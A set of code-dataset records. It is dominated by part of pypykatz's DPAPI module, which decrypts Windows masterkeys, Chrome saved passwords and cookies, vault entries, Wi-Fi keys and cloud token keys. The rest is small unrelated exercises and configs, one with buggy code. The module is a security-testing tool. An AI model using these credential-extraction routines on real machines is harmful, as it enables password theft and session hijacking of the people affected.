masterkeyfile using the domain backup key in .pvk format\n\t\t\"\"\"\n\t\twith open(mkffile, 'rb') as fp:\n\t\t\tdata = fp.read()\n\t\tmkf = MasterKeyFile.from_bytes(data)\n\t\tdk = mkf.domainkey.secret\n\t\tprivkey = PVKFile.from_file(pvkfile).get_key()\n\t\tdecdk = privkey.decrypt(dk[::-1], PKCS1v15())\n\t\tsecret = decdk[8:72] # TODO: proper file format would be good here!!!\n\t\tself.masterkeys[mkf.guid] = secret\n\t\treturn self.masterkeys\n\t\t\t\n\tdef decrypt_masterkey_file(self, file_path, key = None):\n\t\t\"\"\"\n\t\tDecrypts Masterkeyfile\n\t\tfile_path: path to Masterkeyfile\n\t\tkey: raw bytes of the decryption key. If not supplied the function will look for keys already cached in the DPAPI object.\n\t\treturns: CREDENTIAL_BLOB object\n\t\t\"\"\"\n\t\twith open(file_path, 'rb') as f:\n\t\t\treturn self.decrypt_masterkey_bytes(f.read(), key = key)\n\t\n\tdef decrypt_masterkey_bytes(self, data, key = None):\n\t\t\"\"\"\n\t\tDecrypts Masterkeyfile bytes\n\t\tdata: bytearray of the masterkeyfile\n\t\tkey: bytes describing the key used for decryption\n\t\treturns: touple of dictionaries. [0] - > masterkey[guid] = key, [1] - > backupkey[guid] = key\n\t\t\"\"\"\n\t\tmkf = MasterKeyFile.from_bytes(data)\n\t\tmks = {}\n\t\tbks = {}\n\t\tif mkf.masterkey is not None:\n\t\t\tif mkf.guid in self.masterkeys:\n\t\t\t\tmks[mkf.guid] = self.masterkeys[mkf.guid]\n\t\t\t\t\n\t\t\telse:\n\t\t\t\tfor user_key in self.prekeys:\n\t\t\t\t\tdec_key = mkf.masterkey.decrypt(user_key)\n\t\t\t\t\tif dec_key:\n\t\t\t\t\t\tlogger.debug('user key win: %s' % user_key.hex())\n\t\t\t\t\t\tself.masterkeys[mkf.guid] = dec_key\n\t\t\t\t\t\tmks[mkf.guid] = dec_key\n\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\n\t\t\t\tif key is not None:\n\t\t\t\t\tdec_key = mkf.masterkey.decrypt(key)\n\t\t\t\t\tif dec_key:\n\t\t\t\t\t\tself.masterkeys[mkf.guid] = dec_key\n\t\t\t\t\t\tmks[mkf.guid] = dec_key\n\t\t\n\t\tif mkf.backupkey is not None:\n\t\t\tif mkf.guid in self.masterkeys:\n\t\t\t\tmks[mkf.guid] = self.masterkeys[mkf.guid]\n\t\t\t\t\n\t\t\telse:\n\t\t\t\tfor user_key in self.prekeys:\n\t\t\t\t\tdec_key = mkf.backupkey.decrypt(user_key)\n\t\t\t\t\tif dec_key:\n\t\t\t\t\t\tself.backupkeys[mkf.guid] = dec_key\n\t\t\t\t\t\tbks[mkf.guid] = dec_key\n\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\n\t\t\t\tif key is not None:\n\t\t\t\t\tdec_key = mkf.backupkey.decrypt(key)\n\t\t\t\t\tif dec_key:\n\t\t\t\t\t\tself.masterkeys[mkf.guid] = dec_key\n\t\t\t\t\t\tbks[mkf.guid] = dec_key\n\t\t\t\t\t\n\t\treturn mks, bks\n\t\n\tdef decrypt_credential_file(self, file_path):\n\t\t\"\"\"\n\t\tDecrypts CredentialFile\n\t\tfile_path: path to CredentialFile\n\t\treturns: CREDENTIAL_BLOB object\n\t\t\"\"\"\n\t\twith open(file_path, 'rb') as f:\n\t\t\treturn self.decrypt_credential_bytes(f.read())\n\t\n\tdef decrypt_credential_bytes(self, data):\n\t\t\"\"\"\n\t\tDecrypts CredentialFile bytes\n\t\tCredentialFile holds one DPAPI blob, so the decryption is straightforward, and it also has a known structure for the cleartext.\n\t\tPay attention that the resulting CREDENTIAL_BLOB strucutre's fields can hold the secrets in wierd filenames like \"unknown\"\n\t\t\n\t\tdata: CredentialFile bytes\n\t\treturns: CREDENTIAL_BLOB object\n\t\t\"\"\"\n\t\tcred = CredentialFile.from_bytes(data)\n\t\tdec_data = self.decrypt_blob_bytes(cred.data)\n\t\tcb = CREDENTIAL_BLOB.from_bytes(dec_data)\n\t\treturn cb\n\t\t\n\tdef decrypt_blob(self, dpapi_blob, key = None):\n\t\t\"\"\"\n\t\tDecrypts a DPAPI_BLOB object\n\t\tThe DPAPI blob has a GUID attributes which indicates the masterkey to be used, also it has integrity check bytes so it is possible to tell is decryption was sucsessfull.\n\t\t\n\t\tdpapi_blob: DPAPI_BLOB object\n\t\tkey: raw bytes of the decryption key. If not supplied the function will look for keys already cached in the DPAPI object.\n\t\treturns: bytes of the cleartext data\n\t\t\"\"\"\n\t\tif key is None:\n\t\t\tlogger.debug('[DPAPI] Looking for master key with GUID %s' % dpapi_blob.masterkey_guid)\n\t\t\tif dpapi_blob.masterkey_guid not in self.masterkeys:\n\t\t\t\traise Exception('No matching masterkey was found for the blob!')\n\t\t\tkey = self.masterkeys[dpapi_blob.masterkey_guid]\n\t\treturn dpapi_blob.decrypt(key)\n\t\t\n\tdef decrypt_blob_bytes(self, data, key = None):\n\t\t\"\"\"\n\t\tDecrypts DPAPI_BLOB bytes.\n\t\t\n\t\tdata: DPAPI_BLOB bytes\n\t\treturns: bytes of the cleartext data\n\t\t\"\"\"\n\t\tif self.use_winapi is True:\n\t\t\tfrom pypykatz.dpapi.functiondefs.dpapi import CryptUnprotectData\n\t\t\treturn CryptUnprotectData(data)\n\t\t\n\t\tblob = DPAPI_BLOB.from_bytes(data)\n\t\tlogger.debug(str(blob))\n\t\treturn self.decrypt_blob(blob, key = key)\n\t\t\n\tdef decrypt_vcrd_file(self, file_path):\n\t\t\"\"\"\n\t\tDecrypts a VCRD file\n\t\tLocation: %APPDATA%\\Local\\Microsoft\\Vault\\%GUID%\\<>.vcrd\n\t\t\n\t\tfile_path: path to the vcrd file\n\t\treturns: dictionary of attrbitues as key, and a list of possible decrypted data\n\t\t\"\"\"\n\t\twith open(file_path, 'rb') as f:\n\t\t\treturn self.decrypt_vcrd_bytes(f.read())\n\t\t\t\n\tdef decrypt_vcrd_bytes(self, data):\n\t\t\"\"\"\n\t\tDecrypts VCRD file bytes.\n\t\t\n\t\tdata: VCRD file bytes\n\t\treturns: dictionary of attrbitues as key, and a list of possible decrypted data\n\t\t\"\"\"\n\t\tvv = VAULT_VCRD.from_bytes(data)\n\t\treturn self.decrypt_vcrd(vv)\n\t\t\n\tdef decrypt_vcrd(self, vcrd):\n\t\t\"\"\"\n\t\tDecrypts the attributes found in a VCRD object, and returns the cleartext data candidates\n\t\tA VCRD file can have a lot of stored credentials inside, most of them with custom data strucutre\n\t\tIt is not possible to tell if the decryption was sucsesssfull, so treat the result accordingly\n\t\t\n\t\tvcrd: VAULT_VCRD object\n\t\tkey: bytes of the decryption key. optional. If not supplied the function will look for stored keys.\n\t\treturns: dictionary of attrbitues as key, and a list of possible decrypted data\n\t\t\"\"\"\n\t\t\n\t\tdef decrypt_attr(attr, key):\n\t\t\tif attr.data is not None:\n\t\t\t\tif attr.iv is not None:\n\t\t\t\t\tcipher = AES(key, MODE_CBC, attr.iv)\n\t\t\t\telse:\n\t\t\t\t\tcipher = AES(key, MODE_CBC, b'\\x00'*16)\n\t\t\t\t\n\t\t\t\tcleartext = cipher.decrypt(attr.data)\n\t\t\t\treturn cleartext\n\t\t\n\t\tres = {}\n\t\tfor i, key in enumerate(self.vault_keys):\n\t\t\tfor attr in vcrd.attributes:\n\t\t\t\tcleartext = decrypt_attr(attr, key)\n\t\t\t\tif attr not in res:\n\t\t\t\t\tres[attr] = []\n\t\t\t\tres[attr].append(cleartext)\n\t\treturn res\n\t\t\t\t\t\n\tdef decrypt_vpol_bytes(self, data):\n\t\t\"\"\"\n\t\tDecrypts the VPOL file, and returns the two keys' bytes\n\t\tA VPOL file stores two encryption keys.\n\t\t\n\t\tdata: bytes of the VPOL file\n\t\treturns touple of bytes, describing two keys\n\t\t\"\"\"\n\t\tvpol = VAULT_VPOL.from_bytes(data)\n\t\tres = self.decrypt_blob_bytes(vpol.blobdata)\n\t\t\n\t\tkeys = VAULT_VPOL_KEYS.from_bytes(res)\n\t\t\n\t\tself.vault_keys.append(keys.key1.get_key())\n\t\tself.vault_keys.append(keys.key2.get_key())\n\t\t\n\t\treturn keys.key1.get_key(), keys.key2.get_key()\n\t\t\n\tdef decrypt_vpol_file(self, file_path):\n\t\t\"\"\"\n\t\tDecrypts a VPOL file\n\t\tLocation: %APPDATA%\\Local\\Microsoft\\Vault\\%GUID%\\<>.vpol\n\t\t\n\t\tfile_path: path to the vcrd file\n\t\tkeys: Optional.\n\t\treturns: touple of bytes, describing two keys\n\t\t\"\"\"\n\t\twith open(file_path, 'rb') as f:\n\t\t\treturn self.decrypt_vpol_bytes(f.read())\n\n\tdef decrypt_securestring_bytes(self, data):\n\t\treturn self.decrypt_blob_bytes(data)\n\t\t\n\tdef decrypt_securestring_hex(self, hex_str):\n\t\treturn self.decrypt_securestring_bytes(bytes.fromhex(hex_str))\n\t\n\tdef decrypt_securestring_file(self, file_path):\n\t\twith open(file_path, 'r') as f:\n\t\t\tdata = f.read()\n\t\treturn self.decrypt_securestring_hex(data)\n\t\t\n\t\n\t@staticmethod\n\tdef find_masterkey_files_live():\n\t\twindows_loc = DPAPI.get_windows_dir_live()\n\t\tuser_folder = DPAPI.get_users_dir_live()\n\t\t\n\t\treturn DPAPI.find_masterkey_files_offline(user_folder, windows_loc)\n\t\n\t@staticmethod\n\tdef find_masterkey_files_offline(users_path, windows_path):\n\t\tdef is_guid(fname):\n\t\t\tif os.path.isfile(filename) is True:\n\t\t\t\tbase = ntpath.basename(filename)\n\t\t\t\tif base.find('-') == -1:\n\t\t\t\t\treturn False\n\t\t\t\ttry:\n\t\t\t\t\tbytes.fromhex(base.replace('-',''))\n\t\t\t\texcept:\n\t\t\t\t\treturn False\n\t\t\t\treturn True\n\t\t\treturn False\n\t\t\n\t\tmasterkey_files = {}\n\t\tfor filename in glob.glob(os.path.join(windows_path, \"System32\",\"Microsoft\",\"Protect\", \"**\"), recursive = True):\n\t\t\tif is_guid(filename) is True:\n\t\t\t\tlogger.debug('GUID SYSTEM FILE: %s' % filename)\n\t\t\t\tmasterkey_files[ntpath.basename(filename)] = filename\n\t\t\n\t\tuser_folders = {}\n\t\tfor filename in glob.glob(os.path.join(users_path, '*'), recursive=False):\n\t\t\tif os.path.isdir(filename):\n\t\t\t\tuser_folders[filename] = 1\n\t\t\n\t\tfor subfolder in ['Local', 'Roaming', 'LocalLow']:\n\t\t\tfor user_folder in user_folders:\n\t\t\t\tfor filename in glob.glob(os.path.join(user_folder, \"AppData\", subfolder, \"Microsoft\", \"Protect\", '**'), recursive = True):\n\t\t\t\t\tif is_guid(filename) is True:\n\t\t\t\t\t\tmasterkey_files[ntpath.basename(filename)] = filename\n\t\t\t\t\t\tlogger.debug('GUID USER FILE: %s' % filename)\n\t\t\n\t\treturn masterkey_files\n\t\n\t@staticmethod\n\tdef get_users_dir_live():\n\t\tusername = os.environ.get('USERNAME')\n\t\tuserprofile_loc = os.environ.get('USERPROFILE')\n\t\tusername = os.environ.get('USERNAME')\n\t\treturn userprofile_loc[:-len(username)]\n\t\n\t@staticmethod\n\tdef get_windows_dir_live():\n\t\treturn os.environ.get('SystemRoot')\n\n\t@staticmethod\n\tdef get_windows_drive_live():\n\t\treturn os.environ.get('SystemDrive')[0]\n\t\n\t@staticmethod\n\tdef find_chrome_database_file_live():\n\t\treturn DPAPI.find_chrome_database_file_offline(DPAPI.get_users_dir_live())\n\t\n\t@staticmethod\n\tdef find_chrome_database_file_offline(users_path):\n\t\tdb_paths = {} # username -> files\n\t\tuser_folders = {} # username -> folder\n\t\t\n\t\tfor filename in glob.glob(os.path.join(users_path, '*'), recursive=False):\n\t\t\tif os.path.isdir(filename):\n\t\t\t\tusername = ntpath.basename(filename)\n\t\t\t\tif username not in user_folders:\n\t\t\t\t\tuser_folders[username] = []\n\t\t\t\tuser_folders[username].append(filename)\n\t\t\t\t\n\t\tfor subfolder_1 in ['Local', 'Roaming', 'LocalLow']:\n\t\t\tfor subfolder_2 in ['', 'Google']:\n\t\t\t\tfor username in user_folders:\n\t\t\t\t\tif username not in db_paths:\n\t\t\t\t\t\tdb_paths[username] = {}\n\t\t\t\t\tfor user_folder in user_folders[username]:\n\t\t\t\t\t\tdb_path = os.path.join(user_folder, 'AppData', subfolder_1, subfolder_2, 'Chrome','User Data','Default','Login Data' )\n\t\t\t\t\t\tif os.path.isfile(db_path) is True:\n\t\t\t\t\t\t\tdb_paths[username]['logindata'] = db_path\n\t\t\t\t\t\t\tlogger.debug('CHROME LOGINS DB FILE: %s' % db_path)\n\n\t\t\t\t\t\tdb_cookies_path = os.path.join(user_folder, 'AppData', subfolder_1, subfolder_2, 'Chrome','User Data','Default','Cookies' )\n\t\t\t\t\t\tif os.path.isfile(db_cookies_path) is True:\n\t\t\t\t\t\t\tdb_paths[username]['cookies'] = db_cookies_path\n\t\t\t\t\t\t\tlogger.debug('CHROME COOKIES DB FILE: %s' % db_cookies_path)\n\n\t\t\t\t\t\tlocalstate_path = os.path.join(user_folder, 'AppData', subfolder_1, subfolder_2, 'Chrome','User Data', 'Local State' )\n\t\t\t\t\t\tif os.path.isfile(localstate_path) is True:\n\t\t\t\t\t\t\tdb_paths[username]['localstate'] = localstate_path\n\t\t\t\t\t\t\tlogger.debug('CHROME localstate FILE: %s' % localstate_path)\n\t\t\t\t\n\t\treturn db_paths\n\t\n\t@staticmethod\n\tdef get_chrome_encrypted_secret(db_path, dbtype):\n\t\tresults = {}\n\t\tresults['logins'] = []\n\t\tresults['cookies'] = []\n\t\tresults['localstate'] = []\n\n\t\ttry:\n\t\t\tconn = sqlite3.connect(db_path)\n\t\t\tcursor = conn.cursor()\n\t\texcept Exception as e:\n\t\t\tlogger.debug('Failed to open chrome DB file %s' % db_path)\n\t\t\treturn results\n\t\t\n\t\tif dbtype.lower() == 'cookies':\n\t\t\ttry:\n\t\t\t\t#totally not stolen from here https://github.com/byt3bl33d3r/chrome-decrypter/blob/master/chrome_decrypt.py\n\t\t\t\tcursor.execute('SELECT host_key, name, path, encrypted_value FROM cookies')\n\t\t\texcept Exception as e:\n\t\t\t\tlogger.debug('Failed perform query on chrome DB file %s Reason: %s' % (db_path, e))\n\t\t\t\treturn results\n\t\t\t\n\t\t\tfor host_key, name, path, encrypted_value in cursor.fetchall():\n\t\t\t\tresults['cookies'].append((host_key, name, path, encrypted_value))\n\n\t\telif dbtype.lower() == 'logindata':\n\n\t\t\ttry:\n\t\t\t\t#totally not stolen from here https://github.com/byt3bl33d3r/chrome-decrypter/blob/master/chrome_decrypt.py\n\t\t\t\tcursor.execute('SELECT action_url, username_value, password_value FROM logins')\n\t\t\texcept Exception as e:\n\t\t\t\tlogger.debug('Failed perform query on chrome DB file %s Reason: %s' % (db_path, e))\n\t\t\t\treturn results\n\t\t\t\t\n\t\t\tfor url, user, enc_pw in cursor.fetchall():\n\t\t\t\tresults['logins'].append((url, user, enc_pw))\n\t\t\n\t\treturn results\n\t\t\n\tdef decrypt_all_chrome_live(self):\n\t\tdbpaths = DPAPI.find_chrome_database_file_live()\n\t\treturn self.decrypt_all_chrome(dbpaths)\n\t\t\n\t\t\n\tdef decrypt_all_chrome(self, dbpaths, throw = False):\n\t\tfrom unicrypto import use_library, get_cipher_by_name\n\t\tAES = get_cipher_by_name('AES', 'cryptography')\n\n\t\tresults = {}\n\t\tresults['logins'] = []\n\t\tresults['cookies'] = []\n\t\tresults['fmtcookies'] = []\n\t\tlocalstate_dec = None\n\n\t\tfor username in dbpaths:\n\t\t\tif 'localstate' in dbpaths[username]:\n\t\t\t\twith open(dbpaths[username]['localstate'], 'r') as f:\n\t\t\t\t\tencrypted_key = json.load(f)['os_crypt']['encrypted_key']\n\t\t\t\t\tencrypted_key = base64.b64decode(encrypted_key)\n\t\t\t\t\n\t\t\t\ttry:\n\t\t\t\t\tlocalstate_dec = self.decrypt_blob_bytes(encrypted_key[5:])\n\t\t\t\texcept:\n\t\t\t\t\tif throw is True:\n\t\t\t\t\t\traise Exception('LocalState decryption failed!')\n\t\t\t\t\t# this localstate was encrypted for another user...\n\t\t\t\t\tcontinue\n\t\t\tif 'cookies' in dbpaths[username]:\n\t\t\t\tsecrets = DPAPI.get_chrome_encrypted_secret(dbpaths[username]['cookies'], 'cookies')\n\t\t\t\tfor host_key, name, path, encrypted_value in secrets['cookies']:\n\t\t\t\t\tif encrypted_value.startswith(b'v10'):\n\t\t\t\t\t\tnonce = encrypted_value[3:3+12]\n\t\t\t\t\t\tciphertext = encrypted_value[3+12:-16]\n\t\t\t\t\t\ttag = encrypted_value[-16:]\n\t\t\t\t\t\tcipher = AES(localstate_dec, MODE_GCM, IV=nonce, segment_size = 16)\n\t\t\t\t\t\tdec_val = cipher.decrypt(ciphertext, b'', tag)\n\t\t\t\t\t\tresults['cookies'].append((dbpaths[username]['cookies'], host_key, name, path, dec_val ))\n\t\t\t\t\t\tresults['fmtcookies'].append(DPAPI.cookieformatter('https://' + host_key, name, path, dec_val))\n\t\t\t\t\telse:\n\t\t\t\t\t\tdec_val = self.decrypt_blob_bytes(encrypted_value)\n\t\t\t\t\t\tresults['cookies'].append((dbpaths[username]['cookies'], host_key, name, path, dec_val ))\n\t\t\t\t\t\tresults['fmtcookies'].append(DPAPI.cookieformatter('https://' + host_key, name, path, dec_val))\n\n\t\t\tif 'logindata' in dbpaths[username]:\n\t\t\t\tsecrets = DPAPI.get_chrome_encrypted_secret(dbpaths[username]['logindata'], 'logindata')\n\t\t\t\tfor url, user, enc_password in secrets['logins']:\n\t\t\t\t\tif enc_password.startswith(b'v10'):\n\t\t\t\t\t\tnonce = enc_password[3:3+12]\n\t\t\t\t\t\tciphertext = enc_password[3+12:-16]\n\t\t\t\t\t\ttag = enc_password[-16:]\n\t\t\t\t\t\tcipher = AES(localstate_dec, MODE_GCM, IV=nonce, segment_size = 16)\n\t\t\t\t\t\tpassword = cipher.decrypt(ciphertext, b'', tag)\n\t\t\t\t\t\tresults['logins'].append((dbpaths[username]['logindata'], url, user, password))\n\t\t\t\t\t\n\t\t\t\t\telse:\n\t\t\t\t\t\tpassword = self.decrypt_blob_bytes(enc_password)\n\t\t\t\t\t\tresults['logins'].append((dbpaths[username]['logindata'], url, user, password))\n\t\t\t\t\n\t\treturn results\n\t\t\n\tdef get_all_masterkeys_live(self):\n\t\ttry:\n\t\t\tself.get_all_keys_from_lsass_live()\n\t\texcept:\n\t\t\tlogger.debug('Failed to get masterkeys/prekeys from LSASS!')\n\t\t\t\n\t\ttry:\n\t\t\tself.get_prekeys_form_registry_live()\n\t\texcept Exception as e:\n\t\t\tlogger.debug('Failed to get masterkeys/prekeys from registry!')\n\t\t\n\t\tmkfiles = DPAPI.find_masterkey_files_live()\n\t\tfor guid in mkfiles:\n\t\t\tlogger.debug('Decrypting masterkeyfile with guid: %s location: %s' % (guid, mkfiles[guid]))\n\t\t\tmk, bk = self.decrypt_masterkey_file(mkfiles[guid])\n\t\t\tif len(mk) > 0 or len(bk) > 0:\n\t\t\t\tlogger.debug('Decrypted masterkeyfile with guid: %s location: %s' % (guid, mkfiles[guid]))\n\t\t\telse:\n\t\t\t\tlogger.debug('Failed to decrypt masterkeyfile with guid: %s location: %s' % (guid, mkfiles[guid]))\n\t\t\n\t\treturn self.masterkeys, self.backupkeys\n\t\n\t@staticmethod\n\tdef parse_wifi_config_file(filepath):\n\t\twifi = {}\n\t\ttree = ET.parse(filepath)\n\t\troot = tree.getroot()\n\n\t\tfor child in root:\n\t\t\tif child.tag.endswith('}name'):\n\t\t\t\twifi['name'] = child.text\n\t\t\telif child.tag.endswith('}MSM'):\n\t\t\t\tfor pc in child.iter():\n\t\t\t\t\tif pc.tag.endswith('}keyMaterial'):\n\t\t\t\t\t\twifi['enckey'] = pc.text\n\t\treturn wifi\n\n\t@staticmethod\n\tdef get_all_wifi_settings_offline(system_drive_letter):\n\t\twifis = []\n\t\tfor filename in glob.glob(system_drive_letter+':\\\\ProgramData\\\\Microsoft\\\\Wlansvc\\\\Profiles\\\\Interfaces\\\\**', recursive=True):\n\t\t\tif filename.endswith('.xml'):\n\t\t\t\twifi = DPAPI.parse_wifi_config_file(filename)\n\t\t\t\twifis.append(wifi)\n\t\treturn wifis\n\n\t@staticmethod\n\tdef get_all_wifi_settings_live():\n\t\treturn DPAPI.get_all_wifi_settings_offline(DPAPI.get_windows_drive_live())\n\n\tdef decrypt_wifi_live(self):\n\t\t# key is encrypted as system!!!\n\t\tpm = ProcessManipulator()\n\t\ttry:\n\t\t\ttry:\n\t\t\t\tpm.getsystem()\n\t\t\texcept Exception as e:\n\t\t\t\traise Exception('Failed to obtain SYSTEM privileges! Are you admin? Error: %s' % e)\n\t\t\t\n\t\t\tfor wificonfig in DPAPI.get_all_wifi_settings_live():\n\t\t\t\tyield self.decrypt_wifi_config_file_inner(wificonfig)\n\n\t\tfinally:\n\t\t\tpm.dropsystem()\n\n\tdef decrypt_wifi_config_file_inner(self, wificonfig):\n\t\tif 'enckey' in wificonfig and wificonfig['enckey'] != '':\n\t\t\twificonfig['key'] = self.decrypt_securestring_hex(wificonfig['enckey'])\n\t\t\treturn wificonfig\n\t\n\tdef decrypt_wifi_config_file(self, configfile):\n\t\twificonfig = DPAPI.parse_wifi_config_file(configfile)\n\t\treturn self.decrypt_wifi_config_file_inner(wificonfig)\n\t\n\t@staticmethod\n\tdef cookieformatter(host, name, path, content):\n\t\t\"\"\"This is the data format the 'Cookie Quick Manager' uses to load cookies in FireFox\"\"\"\n\t\treturn {\n\t\t\t\"Host raw\": host, #\"https://.pkgs.org/\",\n\t\t\t\"Name raw\": name, #\"distro_id\",\n\t\t\t\"Path raw\": path, #\"/\",\n\t\t\t\"Content raw\": content, # \"196\",\n\t\t\t\"Expires\": \"26-05-2022 21:06:29\", # \"12-05-2022 15:59:48\",\n\t\t\t\"Expires raw\": \"1653591989\", # \"1652363988\",\n\t\t\t\"Send for\": \"Any type of connection\", #\"Encrypted connections only\",\n\t\t\t\"Send for raw\": False, #\"true\",\n\t\t\t\"HTTP only raw\": False, #\"false\",\n\t\t\t\"SameSite raw\": \"lax\", #\"lax\",\n\t\t\t\"This domain only\": False, #\"Valid for subdomains\",\n\t\t\t\"This domain only raw\": False, #\"false\",\n\t\t\t\"Store raw\": \"firefox-default\", #\"firefox-default\",\n\t\t\t\"First Party Domain\": \"\", #\"\"\n\t\t}\n\t\n\tdef decrypt_cloudap_key(self, keyvalue_url_b64):\n\t\tkeyvalue = base64_decode_url(keyvalue_url_b64, bytes_expected=True)\n\t\tkeyvalue = keyvalue[8:] # skip the first 8 bytes\n\t\tkey_blob = DPAPI_BLOB.from_bytes(keyvalue)\n\t\treturn self.decrypt_blob(key_blob)\n\t\n\tdef decrypt_cloudapkd_prt(self, PRT):\n\t\tprt_json = json.loads(PRT)\n\t\tkeyvalue = prt_json.get('ProofOfPossesionKey',{}).get('KeyValue')\n\t\tif keyvalue is None:\n\t\t\traise Exception('KeyValue not found in PRT')\n\n\t\tkeyvalue_dec = self.decrypt_cloudap_key(keyvalue)\n\t\treturn keyvalue_dec\n\n\n\n# arpparse helper\ndef prepare_dpapi_live(methods = [], mkf = None, pkf = None):\n\tdpapi = DPAPI()\n\t\n\tif mkf is not None:\n\t\tdpapi.load_masterkeys(mkf)\n\tif pkf is not None:\n\t\tdpapi.load_prekeys(mkf)\n\t\n\tif 'all' in methods:\n\t\tdpapi.get_all_masterkeys_live()\n\tif 'registry' in methods and 'all' not in methods:\n\t\tdpapi.get_prekeys_form_registry_live()\n\tif 'lsass' in methods and 'all' not in methods:\n\t\tdpapi.get_masterkeys_from_lsass_live()\n\t\n\treturn dpapi\n\ndef main():\n\tmkffile = '/mnt/hgfs/!SHARED/feature/masterkeyfile - 170d0d57-e0ae-4877-bab6-6f5af49d3e8e'\n\tpvkfile = '/mnt/hgfs/!SHARED/feature/pvkfile - ntds_capi_0_fdf0c850-73d3-48cf-86b6-6beb609206c3.keyx.rsa.pvk'\n\tdpapi = DPAPI()\n\tdpapi.decrypt_mkf_with_pvk(mkffile, pvkfile)\n\n\nif __name__ == '__main__':\n\tmain()","repo_name":"skelsec/pypykatz","sub_path":"pypykatz/dpapi/dpapi.py","file_name":"dpapi.py","file_ext":"py","file_size_in_byte":32577,"program_lang":"python","lang":"en","doc_type":"code","stars":2505,"dataset":"github-code","pt":"53"} +{"seq_id":"38282472655","text":"# your task is to complete this function\n# function should return head after patition list\ndef partitionlist(head,x):\n curr=head\n lesser=lesserhead=Node(0)\n greater=greaterhead=Node(0)\n while(curr):\n if curr.data<x:\n lesser.next=curr\n lesser=lesser.next\n else:\n greater.next=curr\n greater=greater.next\n curr=curr.next\n greater.next=None\n lesser.next=greaterhead.next\n return lesserhead.next\n # Code here\n\n\n\n#{ \n# Driver Code Starts\n# Node Class \nclass node:\n def __init__(self, val):\n self.data = val\n self.next = None\n \n# Linked List Class\nclass Linked_List:\n def __init__(self):\n self.head = None\n\n def insert(self, val):\n if self.head == None:\n self.head = node(val)\n else:\n new_node = node(val)\n temp = self.head\n while(temp.next):\n temp=temp.next\n temp.next = new_node\n\ndef createList(arr, n):\n lis = Linked_List()\n for i in range(n):\n lis.insert(arr[i])\n return lis.head\n\nif __name__=='__main__':\n t = int(input())\n for i in range(t):\n n = int(input())\n arr = list(map(int, input().strip().split()))\n head = createList(arr, n)\n if(isLengthEvenOrOdd(head)):\n print('Even')\n else:\n print('Odd')\n# Contributed by: Harshit Sidhwa\n# } Driver Code Ends\n","repo_name":"AprajitaChhawi/365DaysOfCode.JANUARY","sub_path":"Day 20 partition list around x.py","file_name":"Day 20 partition list around x.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"4755926768","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2023/7/9 16:22\n# @Author : streamer\n# @File : config.py\n# @Project : celery_demo\n# @Software: PyCharm\n# @History : \n# VERSION USER DATE DESC\n# v1.0.0 Streamer 2023/7/9 CREATE\nbroker_url='redis://localhost:6379/0'\nresult_backend='mongodb://localhost:27017/'\nmongodb_backend_settings={\n 'database': 'my_test',\n 'taskmeta_collection': 'hello_celery',\n}","repo_name":"lightflyer/celery_demo","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9495873542","text":"# 주어진 데이터 셋에서 age컬럼 상위 20개의 데이터를 구한 다음 \n# f1의 결측치를 중앙값으로 채운다.\n# 그리고 f4가 ISFJ와 f5가 20 이상인 \n# f1의 평균값을 출력하시오!\n\n# - 데이터셋 : basic1.csv \n# - 오른쪽 상단 copy&edit 클릭 -> 예상문제 풀이 시작\n# - File -> Editor Type -> Script\n\nimport pandas as pd\nimport numpy as np\ndf = pd.read_csv('../input/bigdatacertificationkr/basic1.csv')\n\n# 주어진 데이터 셋에서 age컬럼 상위 20개의 데이터\ndf_20 = df.sort_values(by = 'age', ascending = False).reset_index(drop = True).iloc[0:20,:]\n\n# f1의 결측치를 중앙값으로 대체\ndf_20.f1 = df_20.f1.fillna(df_20.f1.median())\n\n# f4가 ISFJ와 f5가 20 이상인 f1의 평균값\nprint(df_20[(df_20.f4 == 'ISFJ')&(df_20.f5>=20)].f1.mean())\n\n# 정답 : 73.875\n\n\n# kaggle answer\n\nimport pandas as pd\n\n# 데이터 불러오기\ndf = pd.read_csv(\"../input/bigdatacertificationkr/basic1.csv\")\n\n# 나이 순(내림차순)으로 정렬\ndf = df.sort_values('age', ascending=False).reset_index(drop=True)\nprint(df)\n\n# 상위 20개 슬라이싱\ndf = df[:20]\nprint(df)\n\n# 결측치 채우기 (중앙값)\ndf['f1'] = df['f1'].fillna(df['f1'].median())\n\n# 조건 ISFJ, f5가 20이상\ncond = (df['f4']=='ISFJ') & (df['f5'] >= 20)\n\n# f1의 평균\ndf[cond]['f1'].mean()\n\n# 정답 : 73.875\n","repo_name":"wjdghwo/Big-Data-Certification-KR","sub_path":"py-t1-15_expected_question.py","file_name":"py-t1-15_expected_question.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"29518116515","text":"\"\"\"\r\nLab de Alg. e programação 17\r\nLuiz Guilherme de Andrade Pires - ECI\r\nDRE -> 121070338\r\ndata: 24/09/2021\r\n\"\"\"\r\n\r\nclass metodo_newton:\r\n def __init__(self, coeficientes, x0, n):\r\n self.coeficientes = coeficientes\r\n self.x0 = x0\r\n self.n = n\r\n \r\n def func_x(self, x):\r\n soma = []\r\n for i in range(len(self.coeficientes)):\r\n s = self.coeficientes[i] * x ** i\r\n soma.append(s)\r\n return sum(soma)\r\n \r\n def der_x(self, x):\r\n soma = []\r\n for i in range(len(1,self.coeficientes)):\r\n s = i * self.coeficientes[i] * x ** (i-1)\r\n soma.append(s)\r\n return sum(soma)\r\n\r\n def raiz(self):\r\n xa = self.x0\r\n xn = 0 \r\n for _ in range(self.n):\r\n try:\r\n xn = xa - (self.func_x(xa)/self.der_x(xa))\r\n xa = xn\r\n \r\n except ZeroDivisionError:\r\n return (\"Abortado\")\r\n \r\n return (func_x(xa), xa)\r\n \r\n\r\n\r\na = metodo_newton([3,2], 2, 1)\r\nprint(a.raiz)\r\n\r\n\r\n \r\n ","repo_name":"ziuLGAP/2021.1-UFRJ","sub_path":"lab_ex17.py","file_name":"lab_ex17.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35228109466","text":"import os\nimport pprint\n\nfrom docker import 